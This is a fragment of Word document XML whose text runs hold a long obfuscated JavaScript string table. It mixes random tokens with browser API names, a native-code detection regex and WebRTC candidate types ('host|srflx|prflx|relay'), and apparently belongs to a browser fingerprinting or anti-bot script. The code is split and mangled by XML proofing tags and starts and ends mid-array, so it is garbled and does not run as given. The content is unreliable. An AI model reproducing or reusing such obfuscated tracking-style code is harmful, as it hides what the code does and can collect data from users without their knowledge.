        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM","E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q","NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-","VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", "LCM", "arguments", "JMAz0w-3tiLE-g", "4H7HD7sdOfFobaDZzl8WuuZqV0c2hjLuZZbk8AJH0Dg", "aGHrCYwnPuREBMLx6z5j5Q",&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
